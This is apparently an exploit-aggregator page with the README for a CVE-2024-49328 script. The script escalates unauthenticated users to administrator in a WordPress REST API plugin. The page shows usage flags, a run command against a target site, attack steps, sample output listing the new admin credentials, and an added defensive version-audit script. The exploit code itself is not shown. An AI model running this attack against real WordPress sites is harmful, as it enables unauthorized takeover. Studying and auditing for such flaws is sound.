## https://sploitus.com/exploit?id=0FAFB36E-FCEF-5A02-A323-06538CBEFCFE
# CVE-2024-49328-exploit
# Description:
This script exploits a privilege escalation vulnerability in the WP REST API FNS Plugin for WordPress. The vulnerability affects all versions up to and including `1.0.0`, allowing unauthenticated attackers to gain administrator privileges.
## Usage
```
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL
                        New email to register
  -p PASSWORD, --password PASSWORD
                        Password for the new user
```
Example Command:
```
python CVE-2024-49328.py -u http://targetsite.com -e admin@example.com -p password123
```
### Details of Exploitation
| **Step** | **Description** |
|----------|-----------------|
| Step 1 | Verify the version of the plugin. |
| Step 2 | Check if the version is exploitable (`1.0.0` or lower). |
| Step 3 | Exploit the vulnerability and register a new admin user. |
| Step 4 | Print the result with user credentials for verification. |
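
The version check in Steps 1 and 2 is also what a site owner needs for an inventory of their own installs. The following is an added example, not code from this repository: it reads the `Stable tag` field from plugin `readme.txt` contents and flags anything at or below `1.0.0`. The readme text is passed in as a string because the plugin's directory name is not given on this page; the function names and sample data are assumptions.

```python
import re

# Highest affected release according to the description above.
LAST_AFFECTED = (1, 0, 0)
STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*(\S+)\s*$", re.I | re.M)


def stable_tag(readme_text):
    """Return the 'Stable tag' value from a plugin readme.txt, or None."""
    match = STABLE_TAG_RE.search(readme_text)
    return match.group(1) if match else None


def parse_version(tag):
    """'1.0' -> (1, 0, 0); None for missing or non-numeric tags such as 'trunk'."""
    if tag is None or not re.fullmatch(r"\d+(\.\d+)*", tag):
        return None
    parts = [int(p) for p in tag.split(".")]
    parts += [0] * (3 - len(parts))  # pad so 1.0 compares equal to 1.0.0
    return tuple(parts)


def classify(readme_text):
    """Return 'affected', 'above-affected-range' or 'unknown' for one install."""
    version = parse_version(stable_tag(readme_text))
    if version is None:
        return "unknown"  # no usable tag: check the installed files by hand
    return "affected" if version <= LAST_AFFECTED else "above-affected-range"


def audit(readmes):
    """Map each install label to its classification."""
    return {label: classify(text) for label, text in readmes.items()}


# Constructed readme.txt contents for hypothetical installs (not real data).
SAMPLE_READMES = {
    "site-a": "=== Example Plugin ===\nContributors: someone\nStable tag: 1.0.0\n",
    "site-b": "=== Example Plugin ===\nStable tag: 0.9\r\n",
    "site-c": "=== Example Plugin ===\nstable tag: 1.0.1\n",
    "site-d": "=== Example Plugin ===\nStable tag: trunk\n",
    "site-e": "=== Example Plugin ===\nContributors: someone\n",
}

if __name__ == "__main__":
    for label, status in audit(SAMPLE_READMES).items():
        print(f"{label}: {status}")
```

An `unknown` result means the readme carries no numeric tag, so the installed plugin version has to be confirmed another way before the install is ruled out.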
## Example Output
```
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: Nxploit@admin.sa
Password: nxploit
```
### Install the required packages
```
pip install requests
```
## Disclaimer
Warning:
This script is for educational purposes only. Unauthorized use of this script against systems without explicit permission is illegal and unethical.